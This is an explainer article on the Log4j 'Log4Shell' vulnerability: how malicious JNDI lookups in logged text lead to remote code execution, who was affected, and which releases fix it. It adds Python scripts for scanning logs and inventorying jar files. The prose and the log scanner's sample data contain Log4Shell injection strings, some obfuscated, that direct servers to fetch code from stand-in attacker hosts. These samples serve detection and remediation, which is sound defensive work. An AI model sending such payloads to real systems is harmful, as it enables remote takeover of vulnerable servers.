What is the Apache Log4j vulnerability and who is affected?

Cybersecurity is no longer just an issue for people in technical roles. With businesses and individuals relying on technology for their day-to-day activities, it is now part and parcel of modern life. That is why the Log4j vulnerability caused alarm far beyond the security community.

“The most serious vulnerability she has seen in her career. Already millions of attempts to exploit its vulnerability” 

Jen Easterly (Director of the U.S. Cybersecurity and Infrastructure Security Agency)

The Apache Software Foundation, best known for the Apache HTTP Server, also maintains Log4j, a separate Java logging library.

Log4j is an open-source, Java-based logging library for recording events and errors and reporting diagnostic information to administrators and users. Log4Shell is the name given to the vulnerability in it (CVE-2021-44228), not to the library itself. A program uses Log4j to write down what is happening: an online game server logging player activity and commands typed into the console, or a web application logging the 404 error for a bad link. Because Log4j is free to use and modify, it has been built into an enormous number of Java products, which is why the flaw reaches so far.

The problem is not that Log4j gathers sensitive data; it is that affected versions (Log4j 2, from 2.0-beta9 up to 2.14.1) interpret special ${...} lookup expressions inside the text they log. One of those lookups, JNDI, contacts a server named in the expression and loads Java code from it. So if an attacker can get a string such as ${jndi:ldap://<attacker's server>/x} into anything the application logs (a username, a chat message, an HTTP User-Agent header), the application fetches and runs the attacker's code. From stealing sensitive data, to planting malicious content, to taking full control of the system, Log4Shell makes all of this easy for cybercriminals.

This Remote Code Execution (RCE) vulnerability means attackers can run code of their choosing on vulnerable systems over the network, without any credentials. That is especially concerning because Log4j is embedded in so many Java applications, cloud services and games platforms, as well as web sites; the exposure is not limited to any one web server product.
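Because the attack string only has to be logged, the first thing most teams did was search their own logs for it. The following is an added example, not code from the original article or from the Apache project: a small Python scanner run over constructed sample web-server log lines (documentation-range IP addresses, not real traffic). It shows why a naive search for the literal text "jndi" is not enough: Log4j's own lookup syntax lets an attacker spell the keyword as ${lower:j}ndi or ${::-j}ndi, so the scanner first collapses those wrappers and only then looks for the JNDI lookup. The regexes cover the wrapper forms seen in the sample lines; real probes vary, so treat this as a triage aid rather than proof of absence.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (documentation-range IPs, not real traffic).
# Lines 2-4 carry Log4Shell probes in the User-Agent field; line 5 contains
# a harmless ${env:...} lookup and line 1 is an ordinary request.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:01:04 +0000] "GET /login HTTP/1.1" 302 0 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.8 - - [10/Dec/2021:12:01:05 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/o}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:06 +0000] "GET /?q=${env:JAVA_VERSION} HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# Wrappers used to hide the keyword "jndi" from naive substring matching.
# ${lower:j} / ${upper:J} resolve to the letter itself; ${::-j} and
# ${env:NOPE:-j} use Log4j's default-value syntax, so the lookup "fails"
# and yields the default "j".
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup we are actually looking for, after the wrappers are gone.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}")


def normalise(text: str) -> str:
    """Collapse nested lookup wrappers until nothing changes, then lowercase."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), text)
    return text.lower()


def detect(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, target) if the line carries a JNDI lookup, else None."""
    match = _JNDI.search(normalise(line))
    if match is None:
        return None
    return match.group(1), match.group(2)


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = detect(line)
        if found is not None:
            hits.append((number, found[0], found[1]))
    return hits


if __name__ == "__main__":
    for number, scheme, target in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme} -> {target}")
```

A hit tells you a probe arrived, not that it worked; the target host and port in each hit are what to look for in outbound connection logs from the application server, which is the evidence that a vulnerable Log4j actually resolved the lookup.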

The vulnerability even affected companies like Microsoft, with attackers potentially able to take over Minecraft servers. Attackers can use compromised machines to mine cryptocurrencies such as Bitcoin, "hacktivists" can gather information on opposing parties or countries (the Belgian Defence Ministry reported being attacked through this flaw), and there are threats against health agencies such as the NHS.

“Everything across heavy industrial equipment, network servers, down to printers, and even your kid’s Raspberry Pi is potentially affected by this flaw. Some affected systems may be on-premises while others may be hosted in the cloud, but no matter where they are, the flaw is likely to have an impact” 

Glen Pendley, Deputy Chief Technology Officer at Tenable.

Multinational organisations have the resources and funding to patch and protect themselves quickly, but every other organisation can still take concrete next steps in its cybersecurity.

Log4j is a software library, so it is usually embedded inside other software and you may not realise you are running it. There are ways to find out whether your personal or business systems are exposed. Start with an inventory of all of your devices and applications, then have your administrators check whether each piece of software includes the Log4j library, including copies bundled inside application archives. If a system contains Log4j 2, even as part of another application, treat it as vulnerable because of the severity of this risk, then update it to a fixed release: Apache lists 2.17.1 for Java 8 and later, with 2.12.4 for Java 7 and 2.3.2 for Java 6. Where an update cannot be applied immediately, the stop-gap Apache documented is removing the JndiLookup class from the log4j-core jar, but that is a mitigation, not a fix.
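The inventory step is where most organisations struggled, because Log4j rarely sits in an obvious place: it is nested inside WAR and fat-jar files. The following is an added example, not code from the original article or from Apache: a Python scanner that walks a directory, opens every jar/war/ear, recurses into archives nested inside them, and reports each copy of log4j-core with its version and whether the JndiLookup class is still present. It builds its own constructed sample tree (placeholder class bytes, not real Log4j jars) so it runs offline. Assumptions are marked in the code: the version is taken from the jar file name, falling back to the Implementation-Version manifest field; the "fixed" floor is 2.17.1, which is right for a Java 8+ estate but would misreport the fixed Java 7/6 branches (2.12.4/2.3.2); and a copy renamed or repackaged under a different package path would be missed.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PACKAGE = "org/apache/logging/log4j/core/"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption: Java 8+ estate, so 2.17.1 is the floor. The fixed Java 7 / Java 6
# branches (2.12.4 / 2.3.2) would be reported as "vulnerable" by this threshold.
FIXED_2X = (2, 17, 1)

_NAME_VERSION = re.compile(r"log4j-core-(\d[\w.]*)\.jar$")
_MANIFEST_VERSION = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)


def parse_version(text: str) -> tuple:
    parts = [int(p) for p in re.findall(r"\d+", text)]
    return tuple((parts + [0, 0, 0])[:3])


def classify(version: Optional[str], jndi_present: bool) -> str:
    if version and parse_version(version) >= FIXED_2X:
        return "patched"
    if not jndi_present:
        return "mitigated"  # JndiLookup.class removed: stop-gap only, still update
    return "vulnerable"


def inspect_archive(zf: zipfile.ZipFile, location: str, findings: List[dict]) -> None:
    names = zf.namelist()
    if any(n.startswith(CORE_PACKAGE) for n in names):
        version = None
        m = _NAME_VERSION.search(location)  # assumption: standard jar naming
        if m:
            version = m.group(1)
        elif "META-INF/MANIFEST.MF" in names:  # fallback: manifest field
            mm = _MANIFEST_VERSION.search(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            version = mm.group(1) if mm else None
        jndi = JNDI_LOOKUP_CLASS in names
        findings.append({"location": location, "version": version,
                         "jndi_lookup_present": jndi, "status": classify(version, jndi)})
    for name in names:  # recurse into nested archives (WEB-INF/lib, fat jars)
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{location}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[dict]:
    findings: List[dict] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        inspect_archive(zf, path, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def _jar_bytes(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed fixture: stand-ins for what an inventory might turn up."""
    def core_jar(version: str, keep_jndi: bool = True) -> bytes:
        entries = {"META-INF/MANIFEST.MF": f"Manifest-Version: 1.0\nImplementation-Version: {version}\n",
                   CORE_PACKAGE + "Logger.class": b"\xca\xfe\xba\xbe"}  # placeholder bytes
        if keep_jndi:
            entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"
        return _jar_bytes(entries)

    files = {
        "app/lib/log4j-core-2.14.1.jar": core_jar("2.14.1"),
        "app/service.war": _jar_bytes({"WEB-INF/lib/log4j-core-2.17.1.jar": core_jar("2.17.1")}),
        "legacy/log4j-core-2.11.2.jar": core_jar("2.11.2", keep_jndi=False),
        "misc/notes.txt": b"not an archive",
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def run_demo() -> List[dict]:
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        findings = scan_tree(root)
        for f in findings:
            f["location"] = os.path.relpath(f["location"], root)
    return sorted(findings, key=lambda f: f["location"])


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['status']:<10} {f['version'] or '?':<8} {f['location']}")
```

Run it against a real host with scan_tree("/opt") or wherever your applications live; the "!" in a location marks an archive nested inside another, which is exactly the copy a package manager will not know about. A "mitigated" result means someone deleted JndiLookup.class as a stop-gap; it still belongs on the update list.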

VMware, whose own products were among those affected, urged its customers to patch the Log4j vulnerabilities; even after reaching out to them directly, it continued to see many companies that had not updated their systems.

Even though most companies rushed to update their systems, cybersecurity experts expect the industry to be dealing with the aftermath of the Log4j vulnerabilities for the next 3-5 years, partly because vulnerable copies are buried deep inside software supply chains. Going forward, the best advice is to keep systems up to date, maintain an inventory of the software components you run, and have the right cyber security measures in place.